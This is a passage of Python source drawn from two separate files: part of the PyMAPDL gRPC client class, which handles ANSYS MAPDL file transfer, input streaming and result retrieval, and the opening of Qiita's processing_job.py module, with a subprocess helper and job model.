the ANSYS program after the system procedure is completed.
ANSYS may not be aware of your specific user environment. For
example, on Linux this command may not recognize aliases,
depending on the hardware platform and user environment.
Parameters
----------
cmd : str
Command string, up to 639 characters (including blanks,
commas, etc.). The specified string is passed verbatim to
the operating system, i.e., no parameter substitution is
performed.
Returns
-------
str
Output from the command.
Examples
--------
>>> mapdl.sys('ls')
"""
# always redirect system output to a temporary file
tmp_file = "__tmp_sys_out__"
super().sys(f"{cmd} > {tmp_file}")
if self._local: # no need to download when local
with open(os.path.join(self.directory, tmp_file)) as fobj:
return fobj.read()
return self._download_as_raw(tmp_file).decode()
def download_result(self, path, progress_bar=False, preference=None):
"""Download remote result files to a local directory
Examples
--------
Download remote result files into the current working directory
>>> import os
>>> mapdl.download_result(os.getcwd())
"""
def _download(targets):
for target in targets:
save_name = os.path.join(path, target)
self.download(target, save_name, progress_bar=progress_bar)
if preference:
if preference not in ["rst", "rth"]:
raise ValueError("``preference`` must be either 'rst' or 'rth'")
# result file basename is the jobname
jobname = self.jobname
rth_basename = "%s.%s" % (jobname, "rth")
rst_basename = "%s.%s" % (jobname, "rst")
remote_files = self.list_files()
result_file = None
if self._prioritize_thermal and rth_basename in remote_files:
result_file = rth_basename
elif rst_basename in remote_files and rth_basename in remote_files:
if preference == "rth":
result_file = rth_basename
else:
result_file = rst_basename
elif rst_basename in remote_files:
result_file = rst_basename
elif rth_basename in remote_files:
result_file = rth_basename
if result_file: # found non-distributed result
save_name = os.path.join(path, result_file)
self.download(result_file, save_name, progress_bar=progress_bar)
return save_name
# otherwise, download all the distributed result files
if jobname[-1].isnumeric():
jobname += "_"
rst_files = []
rth_files = []
for filename in remote_files:
if "rst" in filename and jobname in filename:
rst_files.append(filename)
elif "rth" in filename and jobname in filename:
rth_files.append(filename)
if self._prioritize_thermal and rth_files:
targets = rth_files
else:
if rst_files and rth_files:
if preference is None:
raise ValueError(
"Found both structural and thermal results files."
"\nPlease specify which kind to download using:\n"
'``preference="rth"`` or ``preference="rst"``'
)
if preference == "rst":
targets = rst_files
elif preference == "rth":
targets = rth_files
elif rst_files:
preference = "rst"
targets = rst_files
elif rth_files:
preference = "rth"
targets = rth_files
else:
remote_files_str = "\n".join("\t%s" % item for item in remote_files)
print("\t".join("\n%s" % item for item in ["a", "b", "c"]))
raise FileNotFoundError(
"Unable to locate any result file from the "
"following remote result files:\n\n" + remote_files_str
)
_download(targets)
return os.path.join(path, jobname + "0." + preference)
@protect_grpc
def _ctrl(self, cmd):
"""Issue control command to the mapdl server
Available commands:
- 'EXIT'
Calls exit(0) on the server.
- 'set_verb'
Enables verbose mode on the server.
- 'VERSION'
Returns version string in of the server in the form
"MAJOR.MINOR.PATCH". E.g. "0.3.0". Known versions
include:
2020R2 - "0.3.0"
2021R1 - "0.3.0"
2021R2 - "0.4.0"
Unavailable/Flaky:
- 'time_stats'
Prints a table for time stats on the server.
This command appears to be disabled/broken.
- 'mem-stats'
To be added
"""
self._log.debug('Issuing CtrlRequest "%s"', cmd)
request = anskernel.CtrlRequest(ctrl=cmd)
# handle socket closing upon exit
if cmd.lower() == "exit":
try:
# this always returns an error as the connection is closed
self._stub.Ctrl(request)
except (_InactiveRpcError, _MultiThreadedRendezvous):
pass
return
resp = self._stub.Ctrl(request)
if hasattr(resp, "response"):
return resp.response
@wraps(_MapdlCore.cdread)
def cdread(self, *args, **kwargs):
"""Wraps CDREAD"""
option = kwargs.get("option", args[0])
if option == "ALL":
raise ValueError(
'Option "ALL" not supported in gRPC mode. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
# the old behaviour is to supplied the name and the extension separatelly.
# to make it easier let's going to allow names with extensions
fname = kwargs.get("fname", args[1])
basename = os.path.basename(fname)
if len(basename.split('.')) == 1:
# there is no extension in the main name.
if len(args) > 2:
# if extension is an input as an option (old APDL style)
fname = kwargs.get("fname", args[1]) + '.' + kwargs.get("ext", args[2])
else:
# Using default .db
fname = kwargs.get("fname", args[1]) + '.' + 'cdb'
kwargs.setdefault("verbose", False)
kwargs.setdefault("progress_bar", False)
kwargs.setdefault("orig_cmd", 'CDREAD')
kwargs.setdefault("cd_read_option", option.upper())
self.input(fname, **kwargs)
@wraps(_MapdlCore.tbft)
def tbft(self, oper='', id_='', option1='', option2='', option3='', option4='', option5='', option6='', option7='', **kwargs):
"""Wraps ``_MapdlCore.tbft``."""
if oper.lower() == 'eadd':
# Option 2 is a file and option 4 is the directory.
# Option 3 is be extension
option3 = option3.replace('.', '')
fname = option2 if not option3 else option2 + '.' + option3
filename = os.path.join(option4, fname)
if self._local:
if not os.path.exists(filename) and filename not in self.list_files():
raise FileNotFoundError(f"File '{filename}' could not be found.")
else:
if os.path.exists(filename):
self.upload(filename)
option4 = '' # You don't need the directory if you upload it.
elif filename in self.list_files():
option4 = '' # You don't need the directory if the file is in WDIR
pass
else:
raise FileNotFoundError(f"File '{filename}' could not be found.")
return super().tbft(oper, id_, option1, option2, option3, option4, option5, option6, option7, **kwargs)
@protect_grpc
def input(
self,
fname,
verbose=False,
progress_bar=False,
time_step_stream=None,
chunk_size=512,
orig_cmd='/INP',
**kwargs,
):
"""Stream a local input file to a remote mapdl instance.
Stream the response back and deserialize the output.
Parameters
----------
fname : str
MAPDL input file to stream to the MAPDL grpc server.
time_step_stream : int
Time to wait between streaming updates to send back chunks
from the listener file. Larger values mean more data per
chunk and less chunks, but if the command is short, will
wait until time_step_stream is finished leading to a long
execution time.
Due to stability issues, the default time_step_stream is
dependent on verbosity. The defaults are:
- ``verbose=True``: ``time_step_stream=500``
- ``verbose=False``: ``time_step_stream=50``
These defaults will be ignored if ``time_step_stream`` is
manually set.
orig_cmd : str
Original command. There are some cases, were input is
used to send the file to the grpc server but then we want
to run something different than ``/INPUT``, for example
``CDREAD``.
Returns
-------
str
Response from MAPDL.
Examples
--------
Load a simple ``"ds.dat"`` input file generated from Ansys
Workbench.
>>> output = mapdl.input('ds.dat')
Load that same file while streaming the output in real-time.
>>> output = mapdl.input('ds.dat', verbose=True)
"""
# always check if file is present as the grpc and MAPDL errors
# are unclear
filename = self._get_file_path(fname, progress_bar)
if time_step_stream is not None:
if time_step_stream <= 0:
raise ValueError("``time_step_stream`` must be greater than 0``")
if verbose:
if time_step_stream is None:
time_step_stream = 500
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
request = pb_types.InputFileRequest(filename=filename)
strouts = self._stub.InputFileS(request, metadata=metadata)
responses = []
for strout in strouts:
lines = strout.cmdout
# print out input as it is being run
print("\n".join(lines))
responses.extend(lines)
response = "\n".join(responses)
return response.strip()
# otherwise, not verbose
if time_step_stream is None:
time_step_stream = 50
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
# since we can't directly run /INPUT, we have to write a
# temporary input file that tells mainan to read the input
# file.
tmp_name = "_input_tmp_.inp"
tmp_out = "_input_tmp_.out"
if 'CDRE' in orig_cmd.upper():
# Using CDREAD
option = kwargs.get("cd_read_option", 'COMB')
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{option}','{filename}'\n"
else:
# Using default INPUT
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{filename}'\n"
if self._local:
local_path = self.directory
with open(os.path.join(local_path, tmp_name), "w") as f:
f.write(tmp_dat)
else:
self._upload_raw(tmp_dat.encode(), tmp_name)
request = pb_types.InputFileRequest(filename=tmp_name)
# even though we don't care about the output, we still
# need to check. otherwise, since inputfile is
# non-blocking, we could corrupt the service
chunks = self._stub.InputFileS(request, metadata=metadata)
_ = [chunk.cmdout for chunk in chunks] # unstable
# all output (unless redirected) has been written to a temp output
if self._local:
with open(os.path.join(local_path, tmp_out)) as f:
return f.read()
# otherwise, read remote file
return self._download_as_raw(tmp_out).decode("latin-1")
def _get_file_path(self, fname, progress_bar=False):
"""Find files in the Python and MAPDL working directories.
**The priority is for the Python directory.**
Hence if the same file is in the Python directory and in the MAPDL directory,
PyMAPDL will upload a copy from the Python directory to the MAPDL directory,
overwriting the MAPDL directory copy.
"""
if os.path.isdir(fname):
raise ValueError(f"`fname` should be a full file path or name, not the directory '{fname}'.")
fpath = os.path.dirname(fname)
fname = os.path.basename(fname)
fext = fname.split('.')[-1]
ffullpath = os.path.join(fpath, fname)
if os.path.exists(ffullpath) and self._local:
return ffullpath
if self._local:
if os.path.isfile(fname):
# And it exists
filename = os.path.join(os.getcwd(), fname)
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = os.path.join(self.directory, fname)
else:
# Finally
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
else: # Non-local
# upload the file if it exists locally
if os.path.isfile(ffullpath):
self.upload(ffullpath, progress_bar=progress_bar)
filename = fname
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = fname
else:
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
return filename
def _flush_stored(self):
"""Writes stored commands to an input file and runs the input
file. Used with non_interactive.
"""
self._log.debug("Flushing stored commands")
commands = "\n".join(self._stored_commands)
if self._apdl_log:
self._apdl_log.write(commands + "\n")
self._log.debug(
"Writing the following commands to a temporary " "apdl input file:\n%s",
commands,
)
# write to a temporary input file
def build_rand_tmp():
return os.path.join(tempfile.gettempdir(), f"tmp_{random_string()}.inp")
# rare case of duplicated tmpfile (birthday problem)
tmp_filename = build_rand_tmp()
while os.path.isfile(tmp_filename):
tmp_filename = build_rand_tmp()
with open(tmp_filename, "w") as fid:
fid.writelines(commands)
self._store_commands = False
self._stored_commands = []
# run the stored commands
out = self.input(
tmp_filename,
write_to_log=False,
verbose=False,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=False,
)
# skip the first line as it simply states that it's reading an input file
self._response = out[out.find("LINE= 0") + 13 :]
self._log.info(self._response)
# try/except here because MAPDL might have not closed the temp file
try:
os.remove(tmp_filename)
except:
self._log.warning("Unable to remove temporary file %s", tmp_filename)
@protect_grpc
def _get(self, entity, entnum, item1, it1num, item2, it2num):
"""Sends gRPC *Get request.
.. warning::
Not thread safe. Uses ``_get_lock`` to ensure multiple
request are not evaluated simultaneously.
"""
if self._store_commands:
raise RuntimeError(
"Cannot use gRPC enabled ``GET`` when in non_interactive mode. "
"Exit non_interactive mode before using this method."
)
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num}"
# not threadsafe; don't allow multiple get commands
while self._get_lock:
time.sleep(0.001)
self._get_lock = True
try:
getresponse = self._stub.Get(pb_types.GetRequest(getcmd=cmd))
finally:
self._get_lock = False
if getresponse.type == 0:
raise ValueError(
"This is either an invalid get request, or MAPDL is set"
" to the wrong processor (e.g. on BEGIN LEVEL vs."
" POST26)"
)
if getresponse.type == 1:
return getresponse.dval
elif getresponse.type == 2:
return getresponse.sval
raise RuntimeError(f"Unsupported type {getresponse.type} response from MAPDL")
@protect_grpc
def download(
self,
target_name,
out_file_name=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
):
"""Download a file from the gRPC instance
Parameters
----------
target_name : str
Target file on the server. File must be in the same
directory as the mapdl instance. List current files with
``mapdl.list_files()``
out_file_name : str, optional
Save the filename as a different name other than the
``target_name``.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
progress_bar : bool, optional Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
Examples
--------
Download the remote result file "file.rst" as "my_result.rst"
>>> mapdl.download('file.rst', 'my_result.rst')
"""
if out_file_name is None:
out_file_name = target_name
request = pb_types.DownloadFileRequest(name=target_name)
metadata = [("time_step_stream", "200"), ("chunk_size", str(chunk_size))]
chunks = self._stub.DownloadFile(request, metadata=metadata)
file_size = save_chunks_to_file(
chunks, out_file_name, progress_bar=progress_bar, target_name=target_name
)
if not file_size:
raise FileNotFoundError(f'File "{target_name}" is empty or does not exist')
@protect_grpc
def upload(self, file_name, progress_bar=True):
"""Upload a file to the grpc instance
file_name : str
Local file to upload.
progress_bar : bool, optional Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
Returns
-------
str
Base name of the file uploaded. File can be accessed
relative to the mapdl instance with this file name.
Examples
--------
Upload "local_file.inp" while disabling the progress bar
>>> mapdl.upload('local_file.inp', progress_bar=False)
"""
if not os.path.isfile(file_name):
raise FileNotFoundError(f"Unable to locate filename {file_name}")
chunks_generator = get_file_chunks(file_name, progress_bar=progress_bar)
response = self._stub.UploadFile(chunks_generator)
if not response.length:
raise IOError("File failed to upload")
return os.path.basename(file_name)
@protect_grpc
def _get_array(
self,
entity="",
entnum="",
item1="",
it1num="",
item2="",
it2num="",
kloop="",
**kwargs,
):
"""gRPC VGET request.
Send a vget request, receive a bytes stream, and return it as
a numpy array.
Not thread safe as it uses a constant internal temporary
parameter name. This method uses _vget_lock to ensure
multiple simultaneous request fail.
Returns
-------
values : np.ndarray
Numpy 1D array containing the requested *VGET item and entity.
"""
if "parm" in kwargs:
raise ValueError("Parameter name `parm` not supported with gRPC")
while self._vget_lock:
time.sleep(0.001)
self._vget_lock = True
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num},{kloop}"
try:
chunks = self._stub.VGet2(pb_types.GetRequest(getcmd=cmd))
values = parse_chunks(chunks)
finally:
self._vget_lock = False
return values
def _screenshot_path(self):
"""Returns the local path of the MAPDL generated screenshot.
If necessary, downloads the remotely rendered file.
"""
if self._local:
return super()._screenshot_path()
all_filenames = self.list_files()
filenames = []
for filename in all_filenames:
if ".png" == filename[-4:]:
filenames.append(filename)
filenames.sort()
filename = os.path.basename(filenames[-1])
temp_dir = tempfile.gettempdir()
save_name = os.path.join(temp_dir, "tmp.png")
self.download(filename, out_file_name=save_name)
return save_name
@protect_grpc
def _download_as_raw(self, target_name):
"""Download a file from the gRPC instance as a binary
string without saving it to disk.
"""
request = pb_types.DownloadFileRequest(name=target_name)
chunks = self._stub.DownloadFile(request)
return b"".join([chunk.payload for chunk in chunks])
@property
def is_alive(self) -> bool:
"""True when there is an active connect to the gRPC server"""
if self._exited:
return False
if self.busy:
return True
try:
return bool(self.inquire("", "JOBNAME"))
except:
return False
@property
def xpl(self):
"""MAPDL file explorer
Iteratively navigate through MAPDL files.
Examples
--------
Read the MASS record from the "file.full" file
>>> from ansys import Mapdl
>>> mapdl = Mapdl()
>>> xpl = mapdl.xpl
>>> xpl.open('file.full')
>>> vec = xpl.read('MASS')
>>> vec.asarray()
array([ 4, 7, 10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40, 43, 46, 49, 52,
55, 58, 1], dtype=int32)
"""
return self._xpl
@protect_grpc
def scalar_param(self, pname):
"""Return a scalar parameter as a float.
If parameter does not exist, returns ``None``.
"""
request = pb_types.ParameterRequest(name=pname, array=False)
presponse = self._stub.GetParameter(request)
if presponse.val:
return float(presponse.val[0])
@protect_grpc
def _upload_raw(self, raw, save_as): # consider private
"""Upload a binary string as a file"""
chunks = chunk_raw(raw, save_as)
response = self._stub.UploadFile(chunks)
if response.length != len(raw):
raise IOError("Raw Bytes failed to upload")
# TODO: not fully tested/implemented
@protect_grpc
def Param(self, pname):
presponse = self._stub.GetParameter(pb_types.ParameterRequest(name=pname))
return presponse.val
# TODO: not fully tested/implemented
@protect_grpc
def Var(self, num):
presponse = self._stub.GetVariable(pb_types.VariableRequest(inum=num))
return presponse.val
@property
def math(self):
"""APDL math interface
Returns
-------
:class:`MapdlMath <ansys.mapdl.core.math.MapdlMath>`
Examples
--------
Get the stiffness matrix from MAPDL
>>> mm = mapdl.math.stiff()
>>> matrix = k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
Get the mass matrix from mapdl
>>> mm = mapdl.math.stiff()
>>> matrix = k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
"""
from ansys.mapdl.core.math import MapdlMath
return MapdlMath(self)
@protect_grpc
def _data_info(self, pname):
"""Returns the data type of a parameter
APDLMATH vectors only.
"""
request = pb_types.ParameterRequest(name=pname)
return self._stub.GetDataInfo(request)
@protect_grpc
def _vec_data(self, pname):
"""Downloads vector data from a MAPDL MATH parameter"""
dtype = ANSYS_VALUE_TYPE[self._data_info(pname).stype]
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetVecData(request)
return parse_chunks(chunks, dtype)
@protect_grpc
def _mat_data(self, pname, raw=False):
"""Downloads matrix data from a parameter and returns a scipy sparse array"""
try:
from scipy import sparse
except ImportError: # pragma: no cover
raise ImportError("Install ``scipy`` to use this feature") from None
minfo = self._data_info(pname)
stype = ANSYS_VALUE_TYPE[minfo.stype]
mtype = minfo.objtype
shape = (minfo.size1, minfo.size2)
if mtype == 2: # dense
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetMatData(request)
values = parse_chunks(chunks, stype)
return np.transpose(np.reshape(values, shape[::-1]))
elif mtype == 3: # sparse
indptr = self._vec_data(pname + "::ROWS")
indices = self._vec_data(pname + "::COLS")
vals = self._vec_data(pname + "::VALS")
if raw: # for debug
return vals, indices, indptr, shape
else:
return sparse.csr_matrix((vals, indices, indptr), shape=shape)
raise ValueError(f'Invalid matrix type "{mtype}"')
@property
def locked(self):
"""Instance is in use within a pool"""
return self._locked
@locked.setter
def locked(self, new_value):
self._locked = new_value
@supress_logging
def __str__(self):
try:
if self._exited:
return "MAPDL exited"
stats = self.slashstatus("PROD", mute=False)
except: # pragma: no cover
return "MAPDL exited"
st = stats.find("*** Products ***")
en = stats.find("*** PrePro")
product = "\n".join(stats[st:en].splitlines()[1:]).strip()
info = f"Product: {product}\n"
info += f"MAPDL Version: {self.version}\n"
info += f"ansys.mapdl Version: {__version__}\n"
return info
@supress_logging
@run_as_prep7
def _generate_iges(self):
"""Save IGES geometry representation to disk"""
basename = "_tmp.iges"
if self._local:
filename = os.path.join(self.directory, basename)
self.igesout(basename, att=1)
else:
self.igesout(basename, att=1)
filename = os.path.join(tempfile.gettempdir(), basename)
self.download(basename, filename, progress_bar=False)
return filename
@property
def _distributed_result_file(self):
"""Path of the distributed result file"""
if not self._distributed:
return
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
# ansys decided that a jobname ended in a number needs a bonus "_"
if filename[-1].isnumeric():
filename += "_"
rth_basename = "%s0.%s" % (filename, "rth")
rst_basename = "%s0.%s" % (filename, "rst")
rth_file = os.path.join(self.directory, rth_basename)
rst_file = os.path.join(self.directory, rst_basename)
if self._prioritize_thermal:
if not os.path.isfile(rth_file):
raise FileNotFoundError("Thermal Result not available")
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
@property
def _result_file(self):
"""Path of the non-distributed result file"""
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
try:
ext = self.inquire("", "RSTEXT")
except: # check if rth file exists
ext = ""
if ext == "":
rth_file = os.path.join(self.directory, "%s.%s" % (filename, "rth"))
rst_file = os.path.join(self.directory, "%s.%s" % (filename, "rst"))
if self._prioritize_thermal and os.path.isfile(rth_file):
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
else:
filename = os.path.join(self.directory, "%s.%s" % (filename, ext))
if os.path.isfile(filename):
return filename
@property
def thermal_result(self):
"""The thermal result object"""
self._prioritize_thermal = True
result = self.result
self._prioritize_thermal = False
return result
def list_error_file(self):
"""Listing of errors written in JOBNAME.err"""
files = self.list_files()
jobname = self.jobname
error_file = None
for test_file in [f"{jobname}.err", f"{jobname}0.err"]:
if test_file in files:
error_file = test_file
break
if not error_file:
return None
if self.local:
return open(os.path.join(self.directory, error_file)).read()
elif self._exited:
raise MapdlExitedError(
"Cannot list error file when MAPDL Service has " "exited"
)
return self._download_as_raw(error_file).decode("latin-1")
@property
def result(self):
"""Binary interface to the result file using ``pyansys.Result``
Examples
--------
>>> mapdl.solve()
>>> mapdl.finish()
>>> result = mapdl.result
>>> print(result)
PyANSYS MAPDL Result file object
Units : User Defined
Version : 18.2
Cyclic : False
Result Sets : 1
Nodes : 3083
Elements : 977
Available Results:
EMS : Miscellaneous summable items (normally includes face pressures)
ENF : Nodal forces
ENS : Nodal stresses
ENG : Element energies and volume
EEL : Nodal elastic strains
ETH : Nodal thermal strains (includes swelling strains)
EUL : Element euler angles
EMN : Miscellaneous nonsummable items
EPT : Nodal temperatures
NSL : Nodal displacements
RF : Nodal reaction forces
"""
from ansys.mapdl.reader import read_binary
from ansys.mapdl.reader.rst import Result
if not self._local:
# download to temporary directory
save_path = os.path.join(tempfile.gettempdir())
result_path = self.download_result(save_path)
else:
if self._distributed_result_file and self._result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
result_path = self._result_file
else:
# return the file with the last access time
filenames = [self._distributed_result_file, self._result_file]
result_path = last_created(filenames)
if result_path is None: # if same return result_file
result_path = self._result_file
elif self._distributed_result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
if not os.path.isfile(self._result_file):
raise RuntimeError("Distributed Cyclic result not supported")
result_path = self._result_file
else:
result_path = self._result_file
if result_path is None:
raise FileNotFoundError("No result file(s) at %s" % self.directory)
if not os.path.isfile(result_path):
raise FileNotFoundError("No results found at %s" % result_path)
return read_binary(result_path)
@wraps(_MapdlCore.igesin)
def igesin(self, fname="", ext="", **kwargs):
"""Wrap the IGESIN command to handle the remote case."""
if self._local:
out = super().igesin(fname, ext, **kwargs)
elif not fname:
out = super().igesin(**kwargs)
elif fname in self.list_files():
# check if this file is already remote
out = super().igesin(fname, ext, **kwargs)
else:
if not os.path.isfile(fname):
raise FileNotFoundError(
f"Unable to find {fname}. You may need to"
"input the full path to the file."
)
basename = self.upload(fname, progress_bar=False)
out = super().igesin(basename, **kwargs)
return out
@wraps(_MapdlCore.cmatrix)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Run CMATRIX in non-interactive mode and return the response
from file.
"""
# The CMATRIX command needs to run in non-interactive mode
if not self._store_commands:
with self.non_interactive:
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
self._response = self._download_as_raw("cmatrix.out").decode()
return self._response
# otherwise, simply run cmatrix as we're already in
# non-interactive and there's no output to return
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
@property
def _name(self):
"""Instance unique identifier."""
if self._ip or self._port:
return f"GRPC_{self._ip}:{self._port}"
return f"GRPC_instance_{id(self)}"
def get_name(self):
return self._name
@property
def _distributed(self) -> bool:
"""MAPDL is running in distributed mode."""
if self.__distributed is None:
self.__distributed = self.parameters.numcpu > 1
return self.__distributed
@wraps(_MapdlCore.ndinqr)
def ndinqr(self, node, key, **kwargs):
"""Wrap the ``ndinqr`` method to take advantage of the gRPC methods."""
super().ndinqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.elmiqr)
def elmiqr(self, ielem, key, **kwargs):
"""Wrap the ``elmiqr`` method to take advantage of the gRPC methods."""
super().elmiqr(ielem, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.kpinqr)
def kpinqr(self, knmi, key, **kwargs):
"""Wrap the ``kpinqr`` method to take advantage of the gRPC methods."""
super().kpinqr(knmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.lsinqr)
def lsinqr(self, line, key, **kwargs):
"""Wrap the ``lsinqr`` method to take advantage of the gRPC methods."""
super().lsinqr(line, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.arinqr)
def arinqr(self, anmi, key, **kwargs):
"""Wrap the ``arinqr`` method to take advantage of the gRPC methods."""
super().arinqr(anmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.vlinqr)
def vlinqr(self, vnmi, key, **kwargs):
"""Wrap the ``vlinqr`` method to take advantage of the gRPC methods."""
super().vlinqr(vnmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.rlinqr)
def rlinqr(self, nreal, key, **kwargs):
"""Wrap the ``rlinqr`` method to take advantage of the gRPC methods."""
super().rlinqr(nreal, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.gapiqr)
def gapiqr(self, ngap, key, **kwargs):
"""Wrap the ``gapiqr`` method to take advantage of the gRPC methods."""
super().gapiqr(ngap, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.masiqr)
def masiqr(self, node, key, **kwargs):
"""Wrap the ``masiqr`` method to take advantage of the gRPC methods."""
super().masiqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.ceinqr)
def ceinqr(self, nce, key, **kwargs):
"""Wrap the ``ceinqr`` method to take advantage of the gRPC methods."""
super().ceinqr(nce, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.cpinqr)
def cpinqr(self, ncp, key, **kwargs):
"""Wrap the ``cpinqr`` method to take advantage of the gRPC methods."""
super().cpinqr(ncp, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.csyiqr)
def csyiqr(self, ncsy, key, **kwargs):
"""Wrap the ``csyiqr`` method to take advantage of the gRPC methods."""
super().csyiqr(ncsy, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.etyiqr)
def etyiqr(self, itype, key, **kwargs):
"""Wrap the ``etyiqr`` method to take advantage of the gRPC methods."""
super().etyiqr(itype, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.foriqr)
def foriqr(self, node, key, **kwargs):
"""Wrap the ``foriqr`` method to take advantage of the gRPC methods."""
super().foriqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.sectinqr)
def sectinqr(self, nsect, key, **kwargs):
"""Wrap the ``sectinqr`` method to take advantage of the gRPC methods."""
super().sectinqr(nsect, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.mpinqr)
def mpinqr(self, mat, iprop, key, **kwargs):
"""Wrap the ``mpinqr`` method to take advantage of the gRPC methods."""
super().mpinqr(mat, iprop, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.dget)
def dget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``dget`` method to take advantage of the gRPC methods."""
super().dget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.fget)
def fget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``fget`` method to take advantage of the gRPC methods."""
super().fget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.erinqr)
def erinqr(self, key, **kwargs):
"""Wrap the ``erinqr`` method to take advantage of the gRPC methods."""
super().erinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.wrinqr)
def wrinqr(self, key, **kwargs):
"""Wrap the ``wrinqr`` method to take advantage of the gRPC methods."""
super().wrinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
|
processing_job.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from uuid import UUID
from datetime import datetime
from subprocess import Popen, PIPE
from multiprocessing import Process
from os.path import join
from itertools import chain
from collections import defaultdict, Iterable
from json import dumps, loads
from time import sleep
from future.utils import viewitems, viewvalues
import networkx as nx
from qiita_core.qiita_settings import qiita_config
import qiita_db as qdb
def _system_call(cmd):
"""Execute the command `cmd`
Parameters
----------
cmd : str
The string containing the command to be run.
Returns
-------
tuple of (str, str, int)
The standard output, standard error and exist status of the
executed command
Notes
-----
This function is ported from QIIME (http://www.qiime.org), previously named
qiime_system_call. QIIME is a GPL project, but we obtained permission from
the authors of this function to port it to Qiita and keep it under BSD
license.
"""
proc = Popen(cmd, universal_newlines=True, shell=True, stdout=PIPE,
stderr=PIPE)
# Communicate pulls all stdout/stderr from the PIPEs
# This call blocks until the command is done
stdout, stderr = proc.communicate()
return_value = proc.returncode
return stdout, stderr, return_value
def _job_submitter(job_id, cmd):
"""Executes the commands `cmd` and updates the job in case of failure
Parameters
----------
job_id : str
The job id that is executed by cmd
cmd : str
The command to execute the job
"""
std_out, std_err, return_value = _system_call(cmd)
if return_value != 0:
error = ("Error submitting job:\nStd output:%s\nStd error:%s"
% (std_out, std_err))
# Forcing the creation of a new connection
qdb.sql_connection.create_new_transaction()
ProcessingJob(job_id).complete(False, error=error)
class ProcessingJob(qdb.base.QiitaObject):
r"""Models a job that executes a command in a set of artifacts
Attributes
----------
user
command
parameters
status
log
heartbeat
step
Methods
-------
exists
create
"""
_table = 'processing_job'
@classmethod
def exists(cls, job_id):
"""Check if the job `job_id` exists
Parameters
----------
